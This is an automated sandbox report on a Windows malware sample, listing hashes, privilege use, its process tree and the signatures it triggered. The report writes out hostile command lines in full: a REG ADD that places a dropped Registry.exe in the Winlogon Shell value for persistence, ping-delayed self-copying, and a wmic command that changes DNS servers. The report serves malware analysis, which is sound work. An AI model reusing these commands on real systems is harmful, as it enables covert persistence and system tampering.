Analysis
-
max time kernel
122s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11/11/2024, 11:00
Static task
static1
Behavioral task
behavioral1
Sample
dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
Resource
win10v2004-20241007-en
General
-
Target
dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe
-
Size
800KB
-
MD5
68e6c48eab8ee9681659d3d47d1c8442
-
SHA1
0ce069304550e846c8ba47e3198d9c5a3980c26e
-
SHA256
dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee
-
SHA512
d8d32ef2d81ead9c13391738bae3368e48940dbf9c4a9c8e990ebf0f58d6d4a745f32c55472a9d704202b549954efed4ef306b2b4ad81596c6a16541118c5008
-
SSDEEP
12288:1WUovH4E8fkLIJkqNIjqWahIKR/gsk0h97chCVhw3FdCe:1WUovLOqIJk8IjhKC077ch53y
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\Registry.exe," reg.exe -
Executes dropped EXE 4 IoCs
pid Process 2316 Executable.exe 2644 Bootstrapper.exe 1268 Process not Found 2516 Registry.exe -
Loads dropped DLL 9 IoCs
pid Process 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 1560 Process not Found 2448 WerFault.exe 2448 WerFault.exe 2448 WerFault.exe 2448 WerFault.exe 2448 WerFault.exe 572 cmd.exe 572 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Registry.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Executable.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2768 cmd.exe 2772 PING.EXE 572 cmd.exe 1180 PING.EXE 2012 PING.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2784 ipconfig.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2772 PING.EXE 1180 PING.EXE 2012 PING.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2316 Executable.exe 2316 Executable.exe 2316 Executable.exe 2316 Executable.exe 2316 Executable.exe 2316 Executable.exe 2516 Registry.exe 2516 Registry.exe 2516 Registry.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 2316 Executable.exe Token: SeIncreaseQuotaPrivilege 1176 WMIC.exe Token: SeSecurityPrivilege 1176 WMIC.exe Token: SeTakeOwnershipPrivilege 1176 WMIC.exe Token: SeLoadDriverPrivilege 1176 WMIC.exe Token: SeSystemProfilePrivilege 1176 WMIC.exe Token: SeSystemtimePrivilege 1176 WMIC.exe Token: SeProfSingleProcessPrivilege 1176 WMIC.exe Token: SeIncBasePriorityPrivilege 1176 WMIC.exe Token: SeCreatePagefilePrivilege 1176 WMIC.exe Token: SeBackupPrivilege 1176 WMIC.exe Token: SeRestorePrivilege 1176 WMIC.exe Token: SeShutdownPrivilege 1176 WMIC.exe Token: SeDebugPrivilege 1176 WMIC.exe Token: SeSystemEnvironmentPrivilege 1176 WMIC.exe Token: SeRemoteShutdownPrivilege 1176 WMIC.exe Token: SeUndockPrivilege 1176 WMIC.exe Token: SeManageVolumePrivilege 1176 WMIC.exe Token: 33 1176 WMIC.exe Token: 34 1176 WMIC.exe Token: 35 1176 WMIC.exe Token: SeIncreaseQuotaPrivilege 1176 WMIC.exe Token: SeSecurityPrivilege 1176 WMIC.exe Token: SeTakeOwnershipPrivilege 1176 WMIC.exe Token: SeLoadDriverPrivilege 1176 WMIC.exe Token: SeSystemProfilePrivilege 1176 WMIC.exe Token: SeSystemtimePrivilege 1176 WMIC.exe Token: SeProfSingleProcessPrivilege 1176 WMIC.exe Token: SeIncBasePriorityPrivilege 1176 WMIC.exe Token: SeCreatePagefilePrivilege 1176 WMIC.exe Token: SeBackupPrivilege 1176 WMIC.exe Token: SeRestorePrivilege 1176 WMIC.exe Token: SeShutdownPrivilege 1176 WMIC.exe Token: SeDebugPrivilege 1176 WMIC.exe Token: SeSystemEnvironmentPrivilege 1176 WMIC.exe Token: SeRemoteShutdownPrivilege 1176 WMIC.exe Token: SeUndockPrivilege 1176 WMIC.exe Token: SeManageVolumePrivilege 1176 WMIC.exe Token: 33 1176 WMIC.exe Token: 34 1176 WMIC.exe Token: 35 1176 WMIC.exe Token: SeDebugPrivilege 2644 Bootstrapper.exe Token: SeDebugPrivilege 2516 Registry.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2316 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 31 PID 2208 wrote to memory of 2316 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 31 PID 2208 wrote to memory of 2316 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 31 PID 2208 wrote to memory of 2316 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 31 PID 2208 wrote to memory of 2644 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 32 PID 2208 wrote to memory of 2644 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 32 PID 2208 wrote to memory of 2644 2208 dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe 32 PID 2644 wrote to memory of 2708 2644 Bootstrapper.exe 34 PID 2644 wrote to memory of 2708 2644 Bootstrapper.exe 34 PID 2644 wrote to memory of 2708 2644 Bootstrapper.exe 34 PID 2708 wrote to memory of 2784 2708 cmd.exe 36 PID 2708 wrote to memory of 2784 2708 cmd.exe 36 PID 2708 wrote to memory of 2784 2708 cmd.exe 36 PID 2316 wrote to memory of 2768 2316 Executable.exe 37 PID 2316 wrote to memory of 2768 2316 Executable.exe 37 PID 2316 wrote to memory of 2768 2316 Executable.exe 37 PID 2316 wrote to memory of 2768 2316 Executable.exe 37 PID 2768 wrote to memory of 2772 2768 cmd.exe 39 PID 2768 wrote to memory of 2772 2768 cmd.exe 39 PID 2768 wrote to memory of 2772 2768 cmd.exe 39 PID 2768 wrote to memory of 2772 2768 cmd.exe 39 PID 2644 wrote to memory of 2732 2644 Bootstrapper.exe 40 PID 2644 wrote to memory of 2732 2644 Bootstrapper.exe 40 PID 2644 wrote to memory of 2732 2644 Bootstrapper.exe 40 PID 2732 wrote to memory of 1176 2732 cmd.exe 42 PID 2732 wrote to memory of 1176 2732 cmd.exe 42 PID 2732 wrote to memory of 1176 2732 cmd.exe 42 PID 2644 wrote to memory of 2448 2644 Bootstrapper.exe 44 PID 2644 wrote to memory of 2448 2644 Bootstrapper.exe 44 PID 2644 wrote to memory of 2448 2644 Bootstrapper.exe 44 PID 2316 wrote to memory of 572 2316 Executable.exe 45 PID 2316 wrote to memory of 572 2316 Executable.exe 45 PID 2316 wrote to memory of 572 2316 Executable.exe 45 PID 2316 wrote to memory of 572 2316 Executable.exe 45 PID 572 wrote to memory of 1180 572 cmd.exe 47 PID 572 wrote to memory of 1180 572 cmd.exe 47 PID 572 wrote to memory of 1180 572 cmd.exe 47 PID 572 wrote to memory of 1180 572 cmd.exe 47 PID 2768 wrote to memory of 848 2768 cmd.exe 48 PID 2768 wrote to memory of 848 2768 cmd.exe 48 PID 2768 wrote to memory of 848 2768 cmd.exe 48 PID 2768 wrote to memory of 848 2768 cmd.exe 48 PID 572 wrote to memory of 2012 572 cmd.exe 49 PID 572 wrote to memory of 2012 572 cmd.exe 49 PID 572 wrote to memory of 2012 572 cmd.exe 49 PID 572 wrote to memory of 2012 572 cmd.exe 49 PID 572 wrote to memory of 2516 572 cmd.exe 51 PID 572 wrote to memory of 2516 572 cmd.exe 51 PID 572 wrote to memory of 2516 572 cmd.exe 51 PID 572 wrote to memory of 2516 572 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe"C:\Users\Admin\AppData\Local\Temp\dcfeefb8530d15a7f12ac21497b93b61480c922b4850a1de97693b8b97486dee.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\Executable.exe"C:\Users\Admin\AppData\Local\Temp\Executable.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\Registry.exe,"3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 384⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2772
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\Registry.exe,"4⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:848
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 44 > nul && copy "C:\Users\Admin\AppData\Local\Temp\Executable.exe" "C:\Users\Admin\AppData\Local\Registry.exe" && ping 127.0.0.1 -n 44 > nul && "C:\Users\Admin\AppData\Local\Registry.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 444⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1180
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 444⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2012
-
-
C:\Users\Admin\AppData\Local\Registry.exe"C:\Users\Admin\AppData\Local\Registry.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\cmd.exe"cmd" /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:2784
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")3⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\Wbem\WMIC.exewmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2644 -s 11283⤵
- Loads dropped DLL
PID:2448
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
463KB
MD57348784c1b2435bbfcf65e2b1a6a0fcc
SHA1e5e5cf58ca04c0b11f3468a3d13256ed1f9e6d47
SHA2565ec00bf94260666f70facf9a2c7d16979dd5bad3737c23c17394337caffca282
SHA512a5d5b7a9117553e5ad4ec78e6deea1836bd9252d85dc254ea098210bf186b76c760227a44a032d6bb43408870a53ad52ec73566af73c1d5d9d067be446dd2ffa
-
Filesize
800KB
MD52a4dcf20b82896be94eb538260c5fb93
SHA121f232c2fd8132f8677e53258562ad98b455e679
SHA256ebbcb489171abfcfce56554dbaeacd22a15838391cbc7c756db02995129def5a
SHA5124f1164b2312fb94b7030d6eb6aa9f3502912ffa33505f156443570fc964bfd3bb21ded3cf84092054e07346d2dce83a0907ba33f4ba39ad3fe7a78e836efe288